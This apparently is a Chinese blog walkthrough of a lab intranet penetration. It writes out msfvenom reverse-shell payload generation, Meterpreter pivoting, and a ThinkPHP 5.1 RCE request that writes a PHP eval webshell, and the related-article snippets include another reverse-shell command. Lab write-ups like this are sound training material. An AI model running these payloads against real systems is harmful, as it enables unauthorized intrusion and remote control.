一次的内网渗透(自我搭建靶机)

最新推荐文章于 2024-09-16 12:09:53 发布
最新推荐文章于 2024-09-16 12:09:53 发布
阅读量253 收藏
点赞数
文章标签: 网络安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57567689/article/details/128859075
版权

环境 : windows server 2008 asp站点 双网卡

win7 内网主机 开放80web服务 使用thinkphp5.1.15源码

目标 : 拿下两台主机的权限

蚁剑下载地址

https://github.com/AntSwordProject/AntSword-Loader

msf通过webshell上线msf -->

msf查看路由发现存在内网 -->

扫描存活的主机 -->

扫到内网站点 -->

getshell

msf生成exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.6.157 LPORT=8001 -f exe -o

/tmp/lssam.exe

直接到msf拿到回话

土豆提权

拿到最高权限“SYSTEM”

获取子网

run get_local_subnets

添加这边模拟的10网段的内网路由

run autoroute -s 10.10.10.0/24 # 添加到达10.10.10.0网段的路由

run autoroute -p # 打印路由信息

添加路由 , 本质是当你msf中的操作访问10.10.10.0内网的时候 , 会先把请求转发给当前添加了路由 的session

因为这个session回话是在双网卡的win2008上

所以它是能够访问到10段的 , 添加路由的目的就是让我们能够访问到内网

也可以把session回话放到后台 , 使用msf的自动添加路由模块进行操作 , 实战中用哪个都无所谓

background

use post/multi/manage/autoroute

show options

set sessions 1

run -j

route

添加好路由了 , 紧接着使用msf扫描一下内网存活的主机

background

use auxiliary/scanner/portscan/tcp

show options

set RHOSTS 10.10.10.0/24

set PORTS 80,22,3389

set THREADS 20

run

sessions -i 1

shell

for /L %I in (1,1,254) DO @ping -w 1 -n 1 10.10.10.%I | findstr "TTL="

此时只是把msf整个工具拖到了10内网中 , 但是kali机器上的其他工具是无法访问到10段的 , 比如我想用 nmap直接扫10.10.10.2都开放了哪些端口 , 我们可以使用socks_proxy解决这个问题

background

use auxiliary/server/socks_proxy

show options

run

jobs # jobs看看代理是否成功 , 必须先添加路由

然后修改kali的/etc/proxychains4.conf文件

vim /etc/proxychains4.conf

socks5 127.0.0.1 1080

使用proxychain+nmap扫描

proxychains nmap 10.10.10.2 -p 80,3389,445 # 离谱就是扫不到 , 还是上传第三方探测的扫描吧

发现一个web端口 , 使用代理打开火狐浏览器

proxychains firefox

http://10.10.10.2

存在rce nday , 直接使用payload检测

http://10.10.10.2/index.php/?

s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]

[]=-1

查看IP

http://10.10.10.2/index.php/?

s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]

[]=ipconfig

构造WebShell

http://10.10.10.2/index.php/?

s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]

[]=echo "<?php @eval(\$_POST[cmd]);?>" > 405.php

使用蚁剑连接WebShell

注意事项:

10.10.10.2 这个主机要依靠win2008的sessions做的路由+代理才能访问要不然就无法

到10.10.10.2了

访问不到的排查思路:

先排查sessions有没有掉 sysinfo

路由有没有加 meterpreter ---> run autoroute -p

排查socks文件 版本 ip port

凯凯_0523
关注
内网渗透系列之真实内网环境搭建
lza20001103的博客
09-04 1858
真实内网环境搭建 文章目录真实内网环境搭建前言靶机的准备后记 前言 最近学习了内网的一些知识,学会了域的创建,域渗透以及内网渗透方面的知识,这里就简单给大家介绍一下真实内网环境的搭建过程。 靶机的准备 这里需要5台机器,分别是kali+2台防火墙+2台服务器(内网机器)其中防火墙可以去网上下载。或者可以去我的资源那里下载。其中的话,就需要3张网卡了,VM1,VM2,VM8,其中VM1和VM2是仅主机模式,VM8是NAT模式。 靶机的网卡设置如下: 网卡设置: kali(VM1)192.168.101.102
内网渗透——红日靶机学习(一)
jammny
11-13 6387
前言 开启内网学习,域渗透之路... 环境搭建 官方下载地址以及实验文档如下: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 内网拓扑: 我选用wmware ESXI进行内网环境搭建,内网搭建如下: WIN7(web服务器):172.26.16.123/192.168.52.143 WIN2008(域控):192.168.52.138 WIN2003(域成员):192.168.52.141 渗透测试 一、外网打点 信息收..
内网渗透靶机-VulnStack 2
weixin_44368248的博客
02-21 5043
目录 内网渗透靶机-VulnStack 2 主机发现 端口扫描 192.168.111.128 192.168.111.201 漏洞利用 内网信息收集 ipconfig /all Tasklist shell net group "domain users" /domain shell net group “domain admins” /domain shell net group “domain computers” /domain shell net group “domai
dedecms靶场(四种webshell姿势)
最新发布
m0_75036923的博客
09-16 307
点击【生成】【更新主页HTML】将主页位置修改为【./index.php】点击 【生成静态】点击 【更新主页HTML】 再次访问站点首页可发现变化..点击【模板】【默认模板管理】【index.htm】【修改】 在文件修改中添加一句话木马 保存。点击 【模块】 【广告管理】【增加一个新广告】在【广告内容】 处添加一句话木马点击 【确定】点击【系统】【sql命令行工具】写入一句话木马到网站目录下的1.php文件中,确定。一.登陆到后台点击【核心】【文件式管理器】【文件上传】将准备好的一句话木马上传。
渗透测试靶场环境搭建
ytdd66的博客
02-29 1586
CTF(Capture The Flag)竞赛是网络安全领域的一种竞技活动,旨在测试参与者的网络安全技能。解题模式(Jeopardy):这是最常见的CTF竞赛模式。参赛队伍需要在规定的时间内解决主办方提供的网络安全技术挑战题目。题目类型涵盖逆向工程、漏洞挖掘与利用、Web渗透、密码学、取证、隐写、安全编程等多个方面。解题的数量和正确性将决定参赛队伍的排名和得分。攻防模式(Attack-Defense):在这种模式下,参赛队伍在网络空间中相互攻击和防守。
黑客内网渗透环境靶机搭建-------------局域网(windows-xp,windows-2003,kali-linux2019.2)
边城浪子的博客
12-06 2644
在进行ARP,DNS攻击实验的时候需要一个局域网环境,本次就搭建这个环境。 靶机环境: windows-xp IP:10.1.1.1 kali-linux2019.2IP:10.1.1.2 windows-2003IP:10.1.1.3 step1:下载靶机,并导入靶机 点----“文件”----“打开”,有提示“是否己复制”----点“己复制” step2:桥接到VMnet2上...
内网渗透环境搭建
qq_48904485的博客
04-23 4989
在学习内网渗透测试时,需要构建一个内网环境并搭建攻击 主机,通过具体操作理解漏洞的工作原理,从而采取相应的防范措施。一个完整的内网环境,需要各种应用程序、操作系统和网络设备,可能比较复杂。我们只需要搭建其中的核心部分。 一、搭建所需要的环境 通常所说的内网渗透测试,很大程度上就是域渗透测试。搭建域渗透测试环境,在Windows的活动目录环境下进行一系列操作,掌握其操作方法和运行机制,对内网的安全维护有很大的帮助。常见的域环境是使用Windows Server 2012 R2、Windows 7或者Windo
Cfs三层靶机内网渗透模拟
weixin_68210863的博客
10-23 1077
cfs三层靶机渗透详细过程
cs linux内网渗透,记一次利用cs进行内网渗透的过程
weixin_29497981的博客
05-15 1160
一次利用cs进行内网渗透的过程​首先搭建好cs的服务端和客户端连接,下面正式进行渗透环境kali:192.168.0.226域控机:192.168.0.138成员机:192.168.0.251 192.168.0.141操作cs上线首先开启监听cobalt->listeners,host和beacons都为cs服务端的ip地址生成相应的windows木马,上传到靶机251中执行。选择对应的...
掌握内网渗透之道,成为实战高手,看《内网渗透实战攻略》就够了
等风来
01-10 2970
当今,网络系统面临着越来越严峻的安全挑战。在众多的安全挑战中,一种有组织、有特定目标、长时间持续的新型网络攻击日益猖獗,国际上常称之为APT(Advanced Persistent Threat,高级持续性威胁)攻击。传统的渗透测试从外网发起攻击,并以攻破单台主机为目标。与之相比,APT攻击在技术上更加系统地实现了对目标内网主机的大批量控制,从而使业内对内网渗透技术的关注度提高到了一个空前的高度。
CFS三层靶机搭建及其内网渗透
..
07-05 6933
CFS三层靶机搭建及其内网渗透,附靶场环境
作业实践一 网络攻防环境的搭建,20222927
weixin_44982854的博客
03-06 2255
网络攻防实践以网络攻防环境的搭建为基础,在有限的资源环境条件下,搭建一个专属于自己的网络攻防实验环境,可以进行控制及重复的网络攻防技术实验与实践活动,使得对相关的基础知识与底层机制、攻防技术方法有更深入的理解,并掌握攻防技术技能。靶机:包含系统和应用程序安全漏洞,并作为攻击目标的主机。本次实验选用的靶机为Win2kServer_SP0_target和Metasploitable_ubuntu。攻击机∶安装一些专用的攻击软件,用于发起网络攻击的主机。
渗透实战:内网域渗透_内网渗透实例
2201_75735270的博客
05-10 914
本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网域渗透的基本方法、思路和技巧。交替使用了msf、CobaltStrike、frp、chisel、SharpSQLTools等工具,最后通过约束委派拿下了域控。其间运用了很多小工具,文章较长,下面开始此次渗透长途之旅。
红日靶场环境搭建详细步骤
hacker3062的博客
09-01 2229
1、下载好镜像文件。2、直接vmware启动即可。这里我用自己的win10虚拟机作为攻击机,设置为双网卡NAT,vm2(192.168.234.131)设置win7为双网卡,vm1(192.168.52.143),vm2(192.168.234.130)设置win08单网卡vm1(192.168.52.138),win2k3为单网卡vm1(192.168.52.141)这样win10就可以访问win7,但不能直接访问win08和win2k3。三台靶机的初始密码都是hongrisec@2019 ,初次登录需要
一次Vulnstack靶场内网渗透(五)
小王的储物间
07-25 500
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
手把手教你如何进行内网渗透
热门推荐
iO快到碗里来
11-19 8万+
0x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。 内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。 0x01 信息收集 systeminfo 查看系统详细信息,如OS版本、补丁安装情况,可以根据这些信息筛选可利用的漏洞。 net start 查看启动进
内网安全-记一次内网靶机渗透
kali_Ma的博客
02-24 6124
所涉及到的知识点: 1、WEB安全-漏洞发现及利用 2、系统安全-权限提升(漏洞&配置&逃逸) 3、内网安全-横向移动(口令传递&系统漏洞) 实战演练-ATT&CK实战系列-红队评估 环境下载: http://vulnstack.qiyuanxuetang.net/vuln/detail/9/ 利用资源: https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP https://github.com/briskets
内网渗透-ATT&CK第五个攻防靶场环境搭建
a168xzy的博客
12-10 2132
内网渗透-ATT&CK第五个攻防靶场环境搭建 靶场下载地址:download 下载靶场,用vm打开win7和win2008的vmx镜像 打开后到vm中找到编辑,打开网络编辑器,点击更改设置 添加两个网卡 一个使用桥接模式,网卡选择物理机在使用的网卡 另一个使用NAT模式,子网ip使用系统默认 接下来给两个靶机添加网卡 win7一个添加桥接一个添加NAT win2008添加NAT就可以了 ](https://imgchr.com/i/DTdvPU) win2008网络配置 win7网
cfs内网渗透centos7靶机下载
12-05
为了在CentOS 7靶机上进行内网渗透,我们可以通过开放80端口并访问网站的方式进行下载。具体步骤如下: 1. 在Kali Linux上打开代理,以便访问CentOS 7靶机的网站。 2. 打开浏览器,输入CentOS 7靶机的IP地址和80端口号,访问网站。 3. 在网站上查找需要下载的文件,并下载到本地。 另外,我们还可以使用msfvenom生成一个meterpreter反向Shell,然后将其上传到CentOS 7靶机上进行下载。具体步骤如下: 1. 在Kali Linux上使用msfvenom生成一个meterpreter反向Shell,命令如下: ```shell msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> SessionCommunicationTimeout=0 SessionExpiration=0 -f elf > muma.elf ``` 其中,`<attacker IP>`和`<attacker port>`分别为攻击者的IP地址和端口号,`muma.elf`为生成的反向Shell文件名。 2. 将生成的反向Shell文件上传到CentOS 7靶机上,可以使用scp命令,命令如下: ```shell scp muma.elf <username>@<target IP>:<path> ``` 其中,`<username>`为CentOS 7靶机上的用户名,`<target IP>`为CentOS 7靶机的IP地址,`<path>`为上传文件的路径。 3. 在CentOS 7靶机上运行反向Shell文件,命令如下: ```shell ./muma.elf ``` 运行后,反向Shell会连接到攻击者的机器,攻击者可以通过反向Shell进行下载等操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值